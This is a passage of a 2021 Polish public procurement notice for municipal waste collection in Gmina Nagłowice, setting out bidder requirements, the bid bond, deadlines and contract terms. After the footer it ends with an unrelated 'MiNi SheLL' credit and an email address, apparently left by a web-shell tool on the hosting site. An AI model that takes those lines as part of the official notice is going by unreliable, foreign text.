posiadanie wpisu do rejestru<br/>działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, prowadzonego przez Wójta Gminy Nagłowice jako organu właściwego.3)<br/>sytuacji ekonomicznej lub finansowej: W celu potwierdzenia spełniania przez Wykonawcę<br/>warunków udziału w postępowaniu Zamawiający żąda złożenia następujących podmiotowych<br/>środków dowodowych: 1) Dokument potwierdzający, że Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na sumę gwarancyjną określoną przez Zamawiającego nie mniejszą niż 300 000,00<br/>PLN. 4) zdolności technicznej lub zawodowej:W celu potwierdzenia spełniania przez<br/>Wykonawcę warunków udziału w postępowaniu Zamawiający żąda złożenia następujących<br/>podmiotowych środków dowodowych w zakresie:a) wykonanych usług:Na potwierdzenie<br/>niniejszego warunku należy złożyć wykaz wykonanych usług w okresie ostatnich 3 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na<br/>rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających, czy te<br/>usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli<br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>inne odpowiednie dokumenty;Zamawiający uzna warunek za spełniony jeżeli Wykonawca<br/>wykaże, że w tym okresie wykonał co najmniej dwie usługi polegającą na odebraniu odpadów<br/>komunalnych o łącznej masie minimum 400 Mg każda.Do każdej pozycji wykazu należy<br/>załączyć dowody określające, czy usługi te zostały wykonane w sposób należyty.b) posiadanych<br/>pojazdów: Wykonawca winien wykazać posiadanie/ dysponowanie: • dwoma samochodami<br/>specjalistycznymi o ładowności minimum 8 Mg do odbioru odpadów zmieszanych• dwoma<br/>samochodami specjalistycznymi o ładowności minimum 3,5 Mg do odbioru selektywnie<br/>zebranych odpadów• jednym samochodem do odbioru odpadów bez funkcji kompaktującej•<br/>jednym pojazdem typu hakowiec do transportu kontenerów typu KP7,• jednym pojazdem o<br/>dopuszczalnej masie całkowitej do 3,5 Mg przystosowanym do odbioru odpadów z nieruchomości o utrudnionym dojeździe.c) Wykonawca winien posiadać bazę magazynowo –<br/>transportową, do której ma tytuł prawny, usytuowaną w odległości nie większej niż 60 km od granic gminy Nagłowice <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga przedstawienia podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu Wykonawca składa: 1) aktualne zezwolenia na transport odpadów wydane przez<br/>właściwy organ na podstawie ustawy z dnia 14 grudnia 2012r o odpadach lub odpowiadające mu<br/>zezwolenie na transport odpadów wydane na podstawie wcześniej obowiązujących przepisów lub<br/>podać numer rejestrowy pod którym podmiot posiada wpis do Bazy Danych o produktach i<br/>opakowaniach oraz o Gospodarce Odpadami2) aktualne zezwolenie na odbiór zużytego sprzętu<br/>elektrycznego i elektronicznego lub odpowiadające mu zezwolenie na transport odpadów wydane na<br/>podstawie wcześniej obowiązujących przepisów lub podać numer rejestrowy pod którym podmiot<br/>posiada wpis do Bazy Danych o produktach i opakowaniach oraz o Gospodarce Odpadami3) wpis do<br/>rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli<br/>nieruchomości, prowadzonego przez Wójta Gminy Nagłowice jako organu właściwego.4) Dokument<br/>potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez<br/>Zamawiającego nie mniejszą niż 300 000,00 PLN.5) wykaz usług wykonanych nie wcześniej niż w<br/>okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających,<br/>czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli<br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty- sporządzony wg załącznik nr 8 do SWZ6) wykaz dostępnych Wykonawcy w<br/>celu wykonania zamówienia pojazdów (samochodów), spełniający wymagania określone w rozdz. VII pkt. 4 ppkt. 4) lit b)wraz z informacją o podstawie do ich dysponowania- sporządzony wg załącznika nr<br/>9 do SWZ.7) Informacja Wykonawcy o posiadaniu bazy magazynowo – transportowej o odpowiednim<br/>stanie technicznym oraz wyposażeniu umożliwiającym odbieranie odpadów komunalnych zgodnym z<br/>rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań<br/>w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r. poz. 122)<br/>wraz z dokumentami potwierdzającymi fakt jej posiadania. sporządzony wg załącznika nr 10 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 4. Wraz z ofertą stanowiącą zał. nr 1 do SWZ Wykonawca zobowiązany jest złożyć: b) potwierdzenie wpłaty wadium (oryginał gwarancji lub poręczenia, jeśli<br/>wadium wnoszone jest w innej formie niż pieniądz) c) w przypadku Wykonawców działających<br/>przez pełnomocnika – pełnomocnictwo (w formie określonej w pkt 5),d) Oświadczenie o<br/>podwykonawcach jeżeli Wykonawca korzysta z podwykonawców (załącznik nr 4 do SWZ) e)<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika jaki zakres rzeczowy wykonania zamówienia realizować zamierzają<br/>poszczególni Wykonawcy. (załącznik nr 7 do SWZ)f) Wykonawca, który polega na zasobach<br/>innych podmiotów składa wraz z ofertą oświadczenie podmiotu o udostępnieniu zasobów<br/>wskazujące na okoliczności opisane w rozdziale X SWZ oraz oświadczenia podmiotu<br/>udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>odpowiednio spełnianie warunków udziału w postępowaniu , o których mowa w Rozdziale VII<br/>ust. 2g) w przypadku Wykonawców wspólnie ubiegających się o zamówienie – dokument<br/>stwierdzający umocowanie do reprezentowania odpowiednio Wykonawcy, Wykonawców<br/>wspólnie ubiegających się o zamówienie, wystawiony przez upoważniony podmiot w formie<br/>elektronicznej lub cyfrowe odwzorowanie dokumentu wystawionego w postaci papierowej<br/>poświadczonego za zgodność cyfrowego odwzorowania odpowiednio przez wykonawcę,<br/>wykonawcę wspólnie ubiegającego się o udzielenie zamówienia lub notariusza.5.<br/>Pełnomocnictwo składane jest w oryginale w postaci dokumentu elektronicznego opatrzonego<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, jeżeli<br/>zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym<br/>podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym<br/>zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia<br/>zgodności cyfrowego odwzorowania dokumentu w postaci papierowej dokonuje mocodawca lub<br/>notariusz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Zamawiający wymaga złożenia wadium w wysokości 15 000,00 zł (słownie: piętnaście tysięcy<br/>złotych 00/100)2.Wadium wnosi się przed upływem terminu składania ofert i utrzymuje<br/>nieprzerwanie do dnia upływu terminu związania ofertą 3.Przedłużenie terminu związania ofertą<br/>jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie<br/>jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania<br/>ofertą.4.Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach: a) pieniądzu b) gwarancjach bankowych c) gwarancjach<br/>ubezpieczeniowych d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.<br/>5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572)5.Wadium wnoszone w pieniądzu<br/>należy wpłacić przelewem na rachunek bankowy zamawiającego nr rachunku: 51 8493 0004<br/>0110 0100 0332 0007 z dopiskiem: Wadium w przetargu na Odbieranie i zagospodarowanie<br/>odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu<br/>Gminy Nagłowice oraz z Punktu Selektywnej Zbiórki Odpadów Komunalnych6.Wadium<br/>wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym7.Jeżeli wadium jest<br/>wnoszone w formie gwarancji lub poręczenia wykonawca przekazuje zamawiającemu oryginał<br/>gwarancji lub poręczenia w formie elektronicznej. Gwarancja lub poręczenie musi zawierać w<br/>swojej treści nieodwołalnie i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na<br/>rzecz Zamawiającego kwoty wadium.8.Zamawiający zwraca wadium niezwłocznie, nie później<br/>jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności1) upływu terminu związania<br/>ofertą;2) zawarcia umowy w sprawie zamówienia publicznego;3) unieważnienia postępowania o<br/>udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia.9. Zamawiający,<br/>niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium<br/>wykonawcy:1) który wycofał ofertę przed upływem terminu składania ofert;2) którego oferta<br/>została odrzucona;3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego<br/>oferta została wybrana jako najkorzystniejsza;4) po unieważnieniu postępowania, w przypadku<br/>gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do<br/>jego wniesienia.10. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami<br/>wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,<br/>pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew<br/>pieniędzy na rachunek bankowy wskazany przez wykonawcę 11.Zamawiający zwraca wadium<br/>wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi<br/>oświadczenia o zwolnieniu wadium <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, oświadczenie, o których mowa w art. 125 ust. 1 ustawy PZP, składa każdy z<br/>wykonawców wspólnie ubiegających się o udzielnie zamówienia. Oświadczenia te potwierdzają<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu.3. W przypadku,<br/>gdy spełnienie warunku opisanego:1) w rozdziale VII pkt. 4 ppkt. 4 SWZ wykazuje co najmniej<br/>jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia2) w rozdziale VII pkt. 4<br/>ppkt. 4 SWZ wykonawcy wykazują poprzez poleganie na zdolnościach tych z wykonawców,<br/>którzy wykonają usługi, do realizacji których te zdolności są wymagane. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia oświadczają, które usługi wykonają poszczególni<br/>wykonawcy.4. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni<br/>zobowiązani na wezwanie Zamawiającego złożyć aktualne na dzień złożenia podmiotowe środki<br/>dowodowe, o których mowa w rozdz. IX SWZ przy czym: podmiotowe środki dowodowe o<br/>których mowa w rozdz. IX pkt. 8 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy<br/>wykazuje/ą spełnienie warunku w zakresie i na zasadach opisanych w rozdz. VII pkt. 4 SWZ; <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami § 11 zawartymi w Projektowanych Postanowieniach Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-31 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty powinny być złożone za pośrednictwem Platformy Zakupowej https://naglowice.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-31 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Oferty należy sporządzić w języku polskim pod rygorem nieważności w postaci<br/>elektronicznej.2. Zamawiający wymaga złożenia oferty w postaci elektronicznej, podpisanej<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.3. Zamówienie nie jest<br/>podzielne na części.Zamawiający nie dokonuje podziału zamówienia na części. Tym samym<br/>zamawiający nie dopuszcza składania ofert częściowych, o których mowa w art. 7 pkt. 15 Pzp.<br/>Powody niedokonania podziału: Podział na części byłby niecelowy i powodowałby nadmiernie<br/>trudności techniczne a potrzeba skoordynowania działań różnych wykonawców realizujących<br/>poszczególne części zamówienia mogłaby poważnie zagrozić właściwemu wykonaniu<br/>zamówienia4. Zamawiający nie dopuszcza złożenia oferty wariantowej.5. Zamawiający nie<br/>stawia wymagań w zakresie możliwości ubiegania się o udzielenie zamówienia wyłącznie przez<br/>Wykonawców, o których mowa w art. 94 ustawy Pzp.6. Zamawiający wymaga wniesienie<br/>wadium.7. Zamawiający nie przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1<br/>pkt 8.8. Zamawiający nie dopuszcza walut obcych w rozliczeniach z Wykonawcą. Rozliczenia<br/>między Zamawiającym, a Wykonawcą prowadzone będą w złotych polskich (PLN).9.<br/>Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.10. Zamawiający nie<br/>zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań, o których<br/>mowa w art. 60 pkt 2 oraz art. 121 pkt 2 ustawy Pzp.11. Wykonawca może powierzyć<br/>wykonanie części zamówienia Podwykonawcy/om. Zamawiający wymaga, aby w przypadku<br/>powierzenia części zamówienia Podwykonawcy/ om, Wykonawca wskazał w ofercie części<br/>zamówienia, których wykonanie zamierza powierzyć Podwykonawcy/om oraz podał (o ile są mu<br/>wiadome na tym etapie) nazwa/y (firmy) tego Podwykonawcy/ów.12. Zamawiający nie<br/>przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.13.<br/>Zamawiający nie przewiduje złożenia oferty w postaci katalogów elektronicznych.14.<br/>Zamawiający przewiduje wniesienie zabezpieczenia należytego wykonania umowy.15. W<br/>zakresie nie uregulowanym Specyfikacją Warunków Zamówienia, zwaną dalej „SWZ”,<br/>zastosowanie mają przepisy ustawy Pzp.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-20 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com